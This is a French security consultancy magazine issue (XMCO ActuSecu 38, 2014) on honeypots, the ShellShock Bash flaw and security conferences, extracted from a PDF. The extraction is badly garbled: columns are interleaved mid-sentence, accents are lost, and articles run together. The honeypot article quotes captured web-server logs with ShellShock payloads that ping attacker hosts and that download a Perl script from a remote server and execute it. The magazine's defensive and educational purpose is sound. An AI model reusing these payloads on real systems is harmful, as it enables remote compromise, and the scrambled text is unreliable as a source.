XMCO ActuSecu 38 Honeypots ShellShock
XMCO ActuSecu 38 Honeypots ShellShock
XMCO ActuSecu 38 Honeypots ShellShock
scu 38
lACTUSCU est un magazine numrique rdig et dit par les consultants du cabinet de conseil XMCO OCTOBRE 2014
Les honeypots
Mise en place et analyse des rsultats gnrs par un honeypot
ShellShock
Analyse de la faille qui fait peur
Confrences
Hack In Paris, SSTIC, HITB
Actualit du moment
Plugins Wordpress, TrueCrypt et Samba (CVE-2014-3560)
Alan Bates
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
www.xmco.fr
2
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Vous tes concern
par la scurit informatique
de votre entreprise ?
XMCO est un cabinet de conseil dont le mtier est
laudit en scurit informatique.
Fond en 2002 par des experts en scurit et dirig par ses
fondateurs, les consultants de chez XMCO ninterviennent que
sous forme de projets forfaitaires avec engagement de rsultats.
Les tests dintrusion, les audits de scurit, la veille en
we deliver security expertise
vulnrabilit constituent les axes majeurs de dveloppement
de notre cabinet.
Nos services
Test dintrusion
Mise lpreuve de vos rseaux, systmes et applications web par nos
experts en intrusion. Utilisation des mthodologies OWASP, OSSTMM, CCWAPSS.
Audit de Scurit
Audit technique et organisationnel de la scurit de votre Systme
dInformation. Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
sommaire p. 5
p. 5
Honeypot
Prsentation et fonctionnement
p. 16
ShellShock
Retour sur la faille qui fait peur...
p. 21
p. 16 p. 21 Confrences
HIP, HITB et SSTIC
p. 49
Actualit du moment
Les plugins WordPress, la faille
Samba CVE-2014-3560 et True-
Crypt
p. 61 p. 61
Contact Rdaction : [email protected] - Rdacteur en chef : Adrien GUINAULT - Direction artistique : Conformment aux lois, la reproduction ou la contrefaon des mo-
Romain MAHIEU - Ralisation : Agence plusdebleu - Contributeurs : Antonin AUROY, Stphane AVI, Etienne dles, dessins et textes publis dans la publicit et la rdaction de
lActuScu 2014 donnera lieu des poursuites. Tous droits rservs
BAUDIN, Frdric CHARPENTIER, Charles DAGOUAT, Damien GERMONVILLE, Yannick HAMON, Marc LEBRUN, - Socit XMCO. la rdaction dcline toute responsabilit pour tous les
Romain LEONARD, Thomas LIAIGRE, Cyril LORENZETTO, Rodolphe NEUVILLE, Julien MEYER, Clment MEZINO, documents, quel quen soit le support, qui lui serait spontanment
confi. Ces derniers doivent tre joints une enveloppe de rexpdi-
Stphanie RAMOS, Arnaud REYGNAUD, Rgis SENET, Julien TERRIAC, Pierre TEXIER, David WEBER.
4 tion prpaye. Ralisation, Octobre 2014.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Prsentation et fonctionnement dun honeypot
Une des problmatiques majeures en matire de scurit est de savoir dtecter et analyser les attaques rapide-
ment afin de prendre les mesures adquates pour sen protger.
moins de placer des capteurs sur lensemble des systmes composant un SI (ou dtre diteur dantivirus et
davoir ainsi des remontes automatiques), il ny pas cinquante solutions pour cela. La premire est de surveiller
les traces remontes par son SI, lorsque les traces existent et que lon sait o les trouver. La seconde est dutiliser
un IDS. La troisime consiste placer au sein du SI des systmes exposant volontairement des failles de scurit
afin de rvler des comportements douteux...
Ces systmes, qui jouent le rle de pots de miel, sont logiquement appels honeypots . Sont-ils efficaces ?
Quels rsultats peut-on en tirer ? Rponses dans cet article.
Par Charles DAGOUAT
Les Honeypots
Tomaz Stolfa
> Prsentation des honeypots unauthorized or illicit use of that resource (Lance
Spitzner) .
Quest-ce quun honeypot ?
http://www.tracking-hackers.com/papers/honeypots.
La dfinition Wikipedia est on ne peut plus claire. html
Dans le jargon de la scurit informatique, un honeypot, Finalement, un pot de miel correspond donc lmula-
ou pot de miel, est un ordinateur ou un programme vo- tion dun systme dexploitation, dun service, ou enfin
lontairement vulnrable destin attirer et piger les dun simple logiciel vulnrable.
pirates, ou plus gnralement, leurs bots malveillants (cf
http://fr.wikipedia.org/wiki/Honeypot).
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Caractristiques dun honeypot bien dtre en mesure de remonter des alertes dans le
temps.
partir de ces deux dfinitions, on peut dduire les prin-
cipales caractristiques dun pot de miel :
Pourquoi installer un honeypot ?
+ un honeypot est un systme qui na aucune valeur m-
tier/business en terme de production ; Linstallation dun pot de miel peut avoir plusieurs objec-
tifs :
+ lensemble des communications relatives aux honey-
pots peut tre considr comme tant malveillant : un ho-
neypot cherchant se connecter une autre ressource est
+ analyser le comportement dun pirate ou dun logiciel
malveillant ;
probablement compromis et il ny a aucune raison quun
utilisateur lgitime interagisse avec ce systme ou ce ser-
vice ;
+identifier les postes compromis par des malwares ra-
lisant des scans du rseau interne pour se propager ;
type doutil permet de la dtecter, ainsi que de dtecter Il est important dvoquer la problmatique du placement
ses principales caractristiques : cible, origine, technique du pot de miel au sein du systme dinformation de len-
dexploitation utilises, ... Un pot de miel devrait donc, treprise. Afin dtre en mesure de valoriser les remontes,
dans lidal, tre utilis de manire conjointe avec un il est prfrable de le placer dans un environnement cor-
pare-feu ou un IDS, de manire protger ou plutt respondant lobjectif recherch.
alerter de la possible malveillance interne. Par exemple, si lon veut identifier les postes de travail
compromis sur lesquels les pirates ont install des bots
Il est important de comprendre malveillants sattaquant aux autres postes du SI, il est pr-
que la vulnrabilit frable de placer le pot de miel au milieu mme du LAN,
et non pas dans la DMZ ou en frontal sur Internet.
nest pas forcement prsente Pour identifier une tentative dattaque, il sera au contraire
puisque lhoneypot nest, prfrable de le placer au sein de la DMZ, depuis laquelle
potentiellement, pas compos du logiciel un potentiel attaquant pourrait provenir.
vulnrable dorigine
Il existe un trs grand nombre de stratgies pour mettre Concrtement, les honeypots que lon retrouve le plus
en place un honeypot. Celles-ci vont : couramment prennent la forme dun logiciel install sur
un systme inutilis par les employs de lentreprise. Il
+ de linstallation bte et mchante dune version volon-
tairement vulnrable dun logiciel sur un serveur normale-
permet donc simplement de relever les traces de tenta-
tive de connexion, et les actions qui ont t ralises.
ment inutilis [1] ;
> High-interaction honeypots vs Low-interaction ho- paramtrables par lanalyste. Un tel outil permet diden-
neypot tifier rapidement les navigateurs cibls par les attaquants
ayant mis en ligne le site ou la page malveillante. Pour
Contrairement aux High-interaction honeypots , les cela, Thug va rcursivement tlcharger et excuter le
Low-interaction honeypots ne sont pas capables de code HTML/JavaScript composant le site, et suivre les re-
reproduire parfaitement le comportement dun logiciel ou directions vers les autres pages ou ressources disponibles.
dun serveur. Cela limite donc considrablement la capaci- De cette manire, il sera possible didentifier les failles
t dun pirate exploiter une faille, et donc celle dun ana- exploites par les pirates.
lyste tudier le comportement de lattaquant. En effet, si
le logiciel utilis permet uniquement de dtecter lexploi- BluePot est quant lui un honeypot permettant dtudier
tation de la faille, il ne sera par exemple pas possible de le comportement dattaquants ciblant les priphriques
voir quelles sont les commandes excutes par le pirate Bluetooth. Son usage sera donc relativement limit.
aprs avoir obtenu un accs au systme.
Ghost USB honeypot est un pot de miel permettant dtu-
Dans le cas dun honeypot de type Low-interaction , dier les malwares se propageant au travers de priph-
le serveur ne supporte pas lintgralit des spcifications rique de stockage USB. Cependant, ce logiciel est trs
du protocole, et donc les fonctionnalits offertes par le proche du HIDS (Host-based IDS) puisquil a pour vocation
logiciel. Un pirate est donc potentiellement en mesure de tre install sur des systmes mis en production.
dcouvrir la supercherie. Dans tous les cas, il ne sera pas
possible dobtenir des traces sur lensemble de lattaque. Enfin, il existe un trs grand nombre dhoneypots. Ltude
ralise par lENISA est ce titre trs intressante,
linverse, un High-interaction honeypot sera capable puisquelle recense un trs grand nombre de pots de miel
de reproduire fidlement les spcifications dun logiciel utilisables dans de nombreux contextes, allant mme
vulnrable. Par exemple, un pirate sera en mesure dinte- jusqu voquer le sujet des honeypots SCADA.
ragir avec le serveur.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Cas pratique Ces fichiers, qui correspondent des bases SQLite v3
contiennent les informations que lhoneypot a t en me-
sure dextraire de chacune des tentatives dattaques
Aprs avoir prsent le concept du pot de miel, et leurs identifies. Parmi ces informations, on retrouve les iden-
principales caractristiques, intressons-nous maintenant tifiants utiliss, les commandes excutes, ou encore la
quelques exemples. Les logiciels prsents ci-aprs sont signature p0f de lattaquant. Le principal fichier, logsql.
considrs comme tant des rfrences dans leurs ca- sqlite, contient plusieurs tables dans lesquelles se trouvent
tgories. les donnes qui nous intressent :
Dionaea
noter cependant que de nombreuses requtes dj <random>. Ces fichiers correspondent au contenu envoy
toutes prtes sont proposes dans le blog des dve- par lattaquant, et la rponse qui lui a t retourne par
loppeurs [1] : lhoneypot. Ces fichiers contiennent donc entre autres la
charge malveillante envoye par le pirate pour raliser
+http://carnivore.it/2009/11/06/dionaea_sql_logging son attaque.
A noter que ces bases datant de 2009, la pertinence des Cependant, il existe dautres types dhoneypot, plus
donnes est nulle. Il sagit donc uniquement de prendre simples prendre en main que Dionaea, tels que Kippo.
en main loutil laide de ces donnes. Ce logiciel en python est capable de reproduire le compor-
tement dun serveur SSH.
Enfin, deux outils baptiss readlogsqltree.py et gnu-
plotsql.py sont disponibles pour manipuler les fichiers De manire globale, il permet dexposer sur un port confi-
SQLite gnrs par Dionaea. Le premier permet de lister gurable un serveur SSH. Celui-ci ne permet pas de repro-
les diffrentes connexions ralises vers lhoneypot avec duire une vulnrabilit affectant SSH, mais un problme
leurs principales caractristiques. Le second permet de de configuration du serveur : lutilisation de compte
gnrer un site prsentant les principales statistiques du disposant dun mot de passe faible. Par dfaut, seul le
honeypot, par date ou encore par protocole. compte utilisateur root est dfini, avec pour mot de passe
123456. Avec ce mot de passe, des pirates seront en effet
Ces prcdents fichiers contiennent donc des traces lies en mesure daccder au systme.
aux vnements suspects identifis par lhoneypot. Par
ailleurs, plusieurs dossiers contiennent eux mme dautres
informations intressantes : Cependant, il existe dautres types
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
mandes redfinies en python). Pour le reste du systme Apache et ShellShock
de fichiers, il faut regarder le contenu du dossier honeyfs
, dans lequel on peut retrouver les classiques group , La mise en ligne dun simple serveur web peut galement
hosts , issue , passwd , et enfin shadow . apporter des informations intressantes proches de celles
pouvant tre remontes par un honeypot. Pas besoin de
mettre en place de composants vulnrables, la seule ana-
lyse des logs permet de relever certains types dattaques.
On scarte donc effectivement un peu des honeypots,
mais les informations pouvant tre releves sont trs si-
milaires, pour un peu quon prenne le temps danalyser
les rsultats.
+ nginx-access: 198.XXX.XXX.74 -
Sep/2014:23:12:16 +0200] GET / HTTP/1.1 302 154
- [25/
Lide associe lutilisation de cet honeypot est double. () { :; }; /bin/ping -c 1 104.131.0.69 () { :; }; /bin/ping
La principale fonctionnalit est denregistrer les sessions -c 1 104.XX.X.69
+
SSH tablies par les pirates ou par leurs bots, afin didenti-
fier les actions ralises sur le systme : ajout de compte nginx-access: 62.XX0.XXX.170 - - [06/Oct/2014:13:07:24
utilisateur, tlchargement de fichiers, excution de com- +0200] GET / HTTP/1.1 200 2749 - () { :; }; wget
mandes diverses et varies... http://dev.xxxxx.ru/aHR0cDovL3htY28ub3Jn >> /dev/null
Ces sessions sont enregistres dans le dossier log/tty ,
+
et peuvent tre visualises laide de loutil playlog.py
prsent dans le dossier utils . nginx-access: 62.XX0.XXX.170 - - [30/
Sep/2014:09:02:50 +0200] GET /cgi-sys/entropysearch.
Mais cet honeypot est aussi volutif. Cest--dire quil est cgi HTTP/1.1 404 100327 () { :; }; wget http://xxxxx.
en mesure dapprendre en fonction des actions ra- ru/eG1jby5mclNoZWxsU2hvY2tTYWx0 >> /dev/null
lises par les pirates. Ainsi, un pirate est en mesure de () { :; }; wget http://xxxxx.ru/eG1jby5mclNoZWxsU-
modifier le mot de passe associ au compte root laide 2hvY2tTYWx0 >> /dev/null
+
de la commande passwd . Kippo mmorise le change-
ment effectu par le pirate, et le serveur SSH devient donc nginx-access: 85.XXX.XXX.107 - [25/Sep/2014:23:32:36
accessible avec le nouveau mot de passe dfini. Avec le +0200] GET /veille/client/index.xmco?nv= HTTP/1.1
temps, le serveur devient donc accessible avec un nombre 301 178 - () { :;}; ping -c 1 85.XX.XXX.11 -
+
toujours plus important de mots de passe. Ceux-ci peuvent
tre trouvs dans le fichier data/userdb.txt . nginx-access: 174.XXX.XXX.121 - - [02/
Oct/2014:00:53:04 +0200] GET //cgi-bin/bash HTTP/1.0
404 55067 - () { :;}; /bin/bash -c \x22wget xxxx.
com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.
Kyppo est aussi volutif, cest--dire quil
apache;rm -rf /tmp/.apache\x22
est en mesure dapprendre en fonction
des actions ralises par les pirates Ces quelques lignes de log montrent la simplicit avec
laquelle il est possible didentifier lorigine de ces at-
taques et les commandes que les pirates ont cherch
Parmi les autres points noter concernant le fonctionne- excuter sur les systmes quils ont scanns.
ment de Kippo, les fichiers tlchargs par les auteurs des
tentatives dactions malveillantes peuvent tre retrouvs Ici, les pirates ont simplement plac leur payload au
dans le dossier dl . On trouve ici souvent des archives sein des enttes HTTP Referrer et/ou User-Agent .
dont les noms permettent aux pirates de ne pas veil- Si les serveurs ayant trait ces requtes exposaient un
ler les soupons des administrateurs, avec lutilisation de comportement vulnrable similaire celui du mod_cgi
lextension JPG par exemple. Ces archives contiennent la dApache, les pirates auraient t en mesure de les forcer
plupart du temps diffrents scripts utiliss par les pirates tlcharger des scripts depuis dautres serveurs et les
pour commettre leurs mfaits. La plupart dentre elles ont excuter, ou encore excuter des commandes telles que
t dj t tudies sur internet, limage de la suite des ping vers des serveurs sous leur contrle afin didenti-
doutils post-exploitation gosh ou encore dun bot IRC fier les serveurs pouvant tre compromis.
driv dEnergyMech [2].
A noter, la mdiatisation de cette attaque a pouss un
Un tel outil permet par exemple didentifier les postes chercheur dvelopper un petit honeypot baptis Shock-
compromis dans le rseau interne sur lesquels a t ins- pot spcialement ddi lidentification des attaques ti-
tall un bot. rant partie de ShellShock et ciblant les serveurs web [3].
10
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Les Honeypots
11
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Analyse des rsultats dans le corps dune requte est relativement trange,
puisque le code PHP est normalement interprt par un
Aprs avoir expos durant plusieurs semaines les pots de serveur afin de renvoyer du code HTML ou quivalent au
miel Dionaea et Kippo sur Internet, il est possible de se sein de la rponse retourne par le serveur HTTP.
faire une ide de la pertinence des informations remon-
tes. En sintressant la ressource encode, on identifie rapi-
dement le type dencodage utilis. Quelques lignes de py-
De manire gnrale, il ne faut pas sattendre obtenir thon, ou un site sur Internet permettent dy voir plus clair :
des informations prtes lemploi avec Dionaea ou Kippo.
Comme toute solution de supervision , il est ncessaire
de passer du temps tudier les rsultats pour en extraire
les informations vraiment pertinentes.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Les Honeypots
De cette manire, le pirate est en mesure dexcuter des ments malveillants relevs par Dionaea. Cela permet par
commandes systmes arbitraires distance, avec les pri- exemple de sortir une liste des systmes compromis
vilges de lutilisateur excutant le serveur Web. Dans le
meilleur des cas, cet utilisateur aura des privilges relati- Concernant Kippo, le pot de miel nous a permis de rcu-
vement restreints, et dans le pire, il sagira de lutilisateur prer plusieurs kits dexploitation gnriques (tels que
root , donnant ainsi au pirate les privilges les plus Gosh ) ou dautres outils pirates tels que psyBNC,
levs sur le serveur compromis. pour lesquels des analyses ont dj t publies sur In-
La vulnrabilit exploite par le pirate pour mener cette ternet. Loutil nous a aussi permis de suivre les actions
attaque est prsente en dtail dans larticle de lActuS- ralises par les pirates aprs stre connects notre pot
cu #36. de miel (tlchargement de fichier, ajout de compte, mo-
dification de mot de passe ).
Il est possible dobserver dautres types dattaques simi-
laires ciblant, par exemple, les interfaces dadministration Enfin, les deux outils nous ont permis dobtenir des infor-
telles que la JMX ou la web console, ou encore phpMyAd- mations telles que les couples didentifiant et de mot de
min. passe utiliss par les pirates, et ce pour de nombreux ser-
vices (SSH bien sr, mais aussi MSSQL, SMB, FTP, SIP).
Hormis ce type dattaque, lhoneypot a t en mesure de Prs de 25 000 couples didentifiant et de mot de passe
tlcharger de nombreux fichiers suspects qui ont t au- ont ainsi t tests sur le serveur Kippo sur une priode
tomatiquement soumis pour analyse sur une sandbox en dune dizaine de jours. Sur une priode dun peu plus
ligne. Ce type danalyse est intressant, mais une fois de dun mois, 3500 systmes distincts et priori compromis
plus, demande un retraitement manuel pour interprter, se sont connects aux diffrents services exposs par
minima, les traces identifies dans le rapport, ainsi que notre pot de miel Dionaea. Une centaine de couples lo-
pour les corrler avec les lments observables caractri- gin/mot de passe ont t tests sur les serveurs MySQL
sant le SI de lentreprise. et MsSQL.
> Conclusion
Enfin, le stockage des informations remontes tant ra- Finalement, si lon a peu ou pas de temps consacrer
lis en grande partie dans une base de donnes SQLite, lanalyse des remontes, on peut douter de lintrt dex-
il est relativement simple dtendre Dionaea pour gn- poser un honeypot sur Internet, tant la quantit dinfor-
rer priodiquement des rapports illustrant les comporte- mations remontes est importante. Cependant, plac sur
14
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
un primtre plus restreint tel que dans un LAN ou une
DMZ, les remontes dun tel outil pourront venir compl-
ter la vision rapporte par des sondes de type IDS.
Rfrences
http://bitsmash.wordpress.com/2012/11/06/taking-a-
closer-look-at-some-malicious-irc-bots-caught-in-kippo-ho-
neypot/
+ [3] Shellpot
https://github.com/threatstream/shockpot
http://threatstream.com/blog/shockpot
http://actes.sstic.org/SSTIC04/Droit_et_honeypots/SS-
TIC04-Barel-Droit_et_honeypots.pdf
http://www.arrouan.be/blog/?p=73
http://www.symantec.com/connect/articles/honey-
pots-are-they-illegal
https://www.enisa.europa.eu/activities/cert/support/exer-
cise/files/Honeypots_CERT_Exercise_Toolset.pdf
http://ww.enisa.europa.eu/ftp/ENISA-Honeypot-Exercise.
ova
15
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Analyse de la faille ShellShock
Le 24 septembre dernier, la vulnrabilit rfrence CVE-2014-6271, plus connue sous le nom de ShellShock , a t
divulgue par un franais : Stphane Chazelas. La faille affecte Bash, linterprteur de commandes utilis par dfaut dans
la plupart des distributions Linux et dans de nombreux autres systmes (Unix, Mac OS, etc.).
Cette dcouverte a provoqu un vritable raz-de-mare parmi les diffrents acteurs du march. Quils soient experts en
scurit, administrateurs systme ou diteurs de logiciels, la faille touche un outil trs largement utilis sous tous les sys-
tmes de type Unix depuis plus dune vingtaine dannes.
Ds le lendemain de sa publication, la faille a t trs largement exploite sur Internet, notamment au travers de services
Apache. Retour sur cette vulnrabilit qui a pratiquement surclass Heartbleed.
ShellShock
spettacolopuro
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Prsentation de la vulnrabilit En effet, bien que Bash nait pas pour vocation tre expo-
s directement sur Internet, certaines solutions techniques
Origine de la faille peuvent aboutir une telle situation, sans que lon sen
rende forcment compte.
La faille de scurit identifie par Stphane Chazelas a pour
origine le traitement effectu par Bash sur les variables La faille affecte toutes les versions de Bash publies durant
denvironnement dfinissant une fonction. En effet, ds les 20 dernires annes ; depuis la version 1.14 (publie en
lors quune telle variable est utilise, le logiciel excute les 1994), jusqu la version 4.3 publie en fvrier dernier. De
commandes places aprs la dfinition de la fonction. fait, cet interprteur est install par dfaut sur de nombreux
systmes Linux, Unix, OS X, De plus, ce type de systme
Ce comportement nest bien sr pas prvu par les dve- tant souvent utilis comme socle au sein des boitiers
loppeurs et nest donc pas document, ni mme connu. commercialiss par les diteurs de solutions de scurit,
un trs grand nombre de produits embarquent galement
En effet, lors de la dfinition dune fonction dans lenvi- ce composant vulnrable. ShellShock est une vulnrabilit
ronnement, il est possible dy ajouter des lments qui dautant plus critique que de nombreux logiciels (Procmail,
pourront tre excuts. Ds lors, et en fonction du contexte Exim, CUPS, etc.) implmentent diffrents protocoles (SSH,
dutilisation de Bash, il est possible pour un attaquant de DHCP, FTP) ou modules (Apache/mod_cgi) utilisant linter-
dtourner le comportement de Bash et de raliser une l- prteur Bash par dfaut.
vation de privilges localement sur un systme, voire den
prendre le contrle distance. Il est noter que llvation Certains craignent dailleurs des dgts irrversibles pour
de privilges sexploite de manire indirecte, et ncessite certains objets connects sur lesquels il est souvent impos-
quun programme soit excut dans le contexte dun utili- sible de mettre jour les lments basiques tels que lin-
sateur disposant de plus de droits. terprteur de commandes.
+
de la faille ShellShock, qui affecte linterprteur Bash.
Cration de la variable denvironnement X et dfini-
tion dune fonction vide () {:;} ; Initialement, ils ont dcouvert deux codes dexploitation per-
mettant le tlchargement puis linstallation dun bot IRC crit
+Ajout dune commande non autorise la variable den-
vironnement echo " Vous etes vulnerable a ShellShock " ;
en Perl. Ces deux lments ont des fonctions relativement ba-
siques et sont encods en base64.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
ShellShock
> Analyse de deux produits vuln- Dans les logs de connexion, on peut remarquer que le script
est appel en mme temps que la page.
rables
18
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Analyse de ShellShock sur Pure-ftpd IP) sur le socket ftpd.sock vers le dmon pure-ftpd
sous forme de variables denvironnement. Ces dernires
Pure-FTPd est un serveur FTP sous licence BSD rput pour peuvent tre gres par Bash au travers du script handler.
sa scurit, sa fiabilit et sa simplicit dutilisation. Il sup- sh cr prcdemment.
porte notamment lauthentification par PAM, par une base
de donnes MySQL, mais aussi par la cration dutilisateurs Nous utilisons enfin deux commandes pour dfinir le socket
virtuels, ne disposant pas de compte sur le systme sous- de connexion utiliser [1] et indiquer Pure-FTPd dutiliser
jacent. ce socket pour dialoguer avec le module en charge dim-
plmenter le mcanisme dauthentification externe [2] et
Nous allons voir que ce sont les diverses mthodes dau- dmarrer le serveur.
thentification supportes par le logiciel qui le rendent lui
aussi vulnrable. En effet, en nous basant sur une preuve [1] : # pure-authd -B -s /tmp/ftpd.sock -r /tmp/handler.sh
de concept disponible en libre accs sur Internet, nous [2] : # pure-ftpd -B -l extauth:/tmp/ftpd.sock
avons pu prendre le contrle dune machine sur laquelle
tait install Pure-FTPd. Il ne nous reste plus qu nous connecter au serveur FTP
ainsi cr en spcifiant un nom dutilisateur ou un mot de
La mthode est simple. Nous avons dabord cr une ma- passe correspondant la dclaration dune variable den-
chine virtuelle base sur une distribution Linux Debian sur vironnement dfinissant une fonction suivie dune com-
laquelle nous avons install le service Pure-FTPd. Une des mande qui sera interprte par Bash sur le serveur FTP. Le
conditions ncessaires lexploitation de la vulnrabilit mot de passe na ainsi pas besoin dtre connu puisque
est dutiliser un module externe pour grer lauthentifica- la commande utilise dans la variable de lutilisateur sera
tion sur le serveur FTP. Pour cela, nous avons rcupr un dj excute.
script Bash, jouant le rle d handler (un gestionnaire)
permettant lauthentification. Les paramtres utiliss dans
ce fichier sont disponibles dans la documentation officielle
de Pure-FTPd. Cest un script (dans notre cas) basique qui
permet dautoriser, ou dinterdire, laccs un utilisateur.
Dans notre contexte, la seule vrification ralise est sur
lidentifiant de lutilisateur. Si le login de lutilisateur est
john , le serveur autorise laccs un rpertoire dfini avec
lidentifiant utilisateur et le groupe dfinis dans le fichier.
Connexion au serveur FTP et exploitation de la faille Shellshock
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
ShellShock
Rfrences
+http://blog.xmco.fr
20
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Confrences scurit
http://photos.hitb.org/
KEYNOTE 1: Security at the End of the Universe - Katie ts, les chercheurs en scurit informatique ralisent un
Moussouris excellent travail, puisque dans cet univers hostile, ils conti-
nuent, chaque jour, de trouver et didentifier de nouvelles
La premire keynote de la confrence a t prsen- vulnrabilits.
te par Katie Moussouris qui est lorigine du nouveau
bounty-program lanc le 26 juin 2013 par Microsoft.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Bien que le concepteur soit Google (la socit propose g- Setup for Failure: More Ways to Defeat SecureBoot
nralement des produits de bonne qualit en matire de Corey Kallenberg, Sam Cornwell, Xeno Kovah et John Bu-
scurit) ce qui fait avancer les voitures, ce sont les lignes Derworth
de codes cres par les hommes. Des vulnrabilits seront
donc forcment dcouvertes par les chercheurs un jour. + Slides
http://haxpo.nl/wp-content/uploads/2014/01/D1T2-More-
Un autre concept introduit se nomme Fuzzing the chain of Ways-to-Defeat-Secure-Boot.pdf
influence . Il sagit de sensibiliser les personnes ayant un
fort impact sur la vie quotidienne des utilisateurs. En effet, Cette prsentation sest concentre sur les diffrentes fa-
les membres du Congrs amricain lgifrent autour des ons de contourner le dernier mcanisme de scurit im-
nouvelles technologies. Malheureusement, ils sont, pour la plment au sein des BIOS (UEFI) appel Secure Boot .
plupart, plutt trs gs et ne comprennent donc pas tous
les concepts sous-jacent aux nouvelles technologies et plus Ces mcanismes bas-niveau sont gnralement les der-
particulirement les risques quelles engendrent. Ceci est nires barrires contre linstallation des programmes mal-
d une volution trs rapide du monde dans lequel nous veillants appels rootkit . En sinstallant au sein du BIOS,
voluons. Il suffit de faire le bilan des dix dernires annes. ils sont capables dinfecter le systme hte et de rester invi-
On a donc besoin de familiariser lensemble de cette popu- sibles mme aprs une rinstallation complte du systme
lation qui dispose dune influence importante sur lcosys- dexploitation.
tme li la scurit.
Cette protection, intgre au sein de lUEFI, permet de
Celle-ci nest pas compltement ignorante, grce aux m- nautoriser que le dmarrage des composants du systme
dias traditionnels qui relatent les principaux vnements dexploitation reconnus comme tant sains . Cette fonc-
majeurs comme la vulnrabilit HeartBleed . Il faut donc tionnalit vise interdire le dmarrage dun systme dex-
raliser que toutes les personnes travaillant dans le milieu ploitation corrompu par un rootkit.
de la scurit ont pour devoir de sensibiliser et dinitier
leurs proches aux problmatiques lies lusage des nou- Malheureusement, suivant la configuration ralise par le
velles technologies, du fait, entre autres, de leur scurit. constructeur, cette protection peut tre contourne de plu-
sieurs manires.
Selon Katie, il est important que tout le monde sorte de sa
zone de confort, quimporte son rle. Cest--dire quun ad- Avant de dcrire les aspects techniques voqus lors de la
ministrateur rseau apprenne pirater son propre rseau, prsentation, une vulgarisation des termes employs est
ou encore quun consultant en scurit informatique pro- ncessaire :
gramme des logiciels. Cette dmarche permettra de chan-
ger la vision globale dans le but davancer vers un monde
plus sensibilis et plus raliste face aux problmes lis la
+ SPI Flash : Serial Peripheral Interface Bus Flash fait rf-
rence la mmoire Flash.
scurit.
+BIOS : Basic Input Output System est un mini systme
dexploitation prsent sur la carte mre qui permet de ra-
liser des actions basiques dans le but de configurer le mat-
riel afin de dmarrer le systme dexploitation.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
HITB
Nanmoins sur le matriel test, un Dell Latitude E6430 depuis lespace mmoire utilisateur, permet de contourner
BIOS revision A12, la Relax Policy tait dsactive. le Secure Boot sur lensemble des systmes dexploita-
tion Windows 8. De plus, lors du lancement du rootkit, le
> 2. la variable EFI Setup systme dexploitation considrera quun Secure Boot
a t ralis.
Lactivation de la Secure Boot Policy dpend de la va-
leur, soit dune variable qui peut tre hardcode au sein
du matriel, soit dune variable au sein de lEFI que lon > 3. Contournement de la protection Intel SPI Flash Pro-
nommera setup . La lecture de cette variable est donc tection
ralise au dmarrage.
Certaines autres variables sont dites AT (Authenticated).
Elles ne peuvent pas tre modifies depuis le userland. Cela
est d lutilisation dune cl de chiffrement hardcode au
sein de la carte mre. Ces variables stockes au sein de la
mmoire Flash (SPI) de la carte mre contiennent des infor-
mations critiques comme les empreintes cryptographiques
des excutables contenus dans lEFI.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Nanmoins, ces protections reposent sur la scurit du besoin dtre assimile par lensemble des OEM.
mode SMM qui va dcider qui peut crire ou non (mode Toutes ces vulnrabilits ne concernent pas uniquement
gatekeeper). Or, ce mode est vulnrable de nombreuses Windows mais tous les ordinateurs disposant dun UEFI.
attaques. La surface dattaque est dautant plus grande car
il existe de trs nombreux modules EFI qui utilisent le mode En conclusion, cette confrence fut la plus didactique des
SMM. Par exemple, 495 modules EFI ont t recenss sur le deux jours. Malgr la complexit du sujet, lorateur a su
Dell Latitude E6430. laborder de manire claire et simple. Si des questions
restent encore en suspens, nous vous conseillons de lire ses
Un moyen simple de contourner ces protections serait de slides qui sont trs bien ralises.
dsactiver le SMM afin de pouvoir modifier les variables du
BIOS. Cette action (qui dpend du chipset) est facilement
ralisable si lordinateur cibl na pas activ la protection The NSA Playset
SMI_LOCK. Or, cette configuration non scurise est assez Michael Ossmann (Founder, Great Scott Gadgets)
commune. Sur 8005 ordinateurs tests, 3216 (soit 40%)
navaient pas cette protection active. Ce chiffre peut tre
accentu en effectuant un roll back sur la version du
+ Slides
http://haxpo.nl/wp-content/uploads/2014/01/D1T1-The-
BIOS, opration qui est trs souvent autorise. NSA-Playset.pdf
Une attaque possible est donc de dsactiver le SMM et Avant daborder le sujet de sa confrence, Michael Ossman
dajouter une nouvelle empreinte de notre rootkit au sein a voulu clarifier quelques points. Malgr le sujet abord du-
de la liste des excutables considrs comme tant sains rant la prsentation, il est fier de son gouvernement. Pour
par le Secure Boot . lui, il est tout fait possible de garder un esprit critique sur
ces rvlations tout en portant une grande estime envers
son pays, les tats-Unis.
> Mais qui est responsable de cette vulnrabilit ?
Cette confrence avait pour but de prsenter lensemble
Le dveloppement des BIOS a t ralis de faon disparate des outils utiliss par la NSA (fuites des documents par Ed-
et alatoire. Chacun ralisant sa propre implmentation ward Snowden) et dessayer dlaborer une version Open
dans son coin. Source. La motivation de Michael Ossman : Parce que cest
Nanmoins, la plupart des constructeurs (OEM) utilisent fun .
limplmentation faite par American Megatrends.
La prsentation sest concentre sur la partie matrielle.
+ Slides
http://revuln.com/files/Ferrante_Auriemma_Reloading_
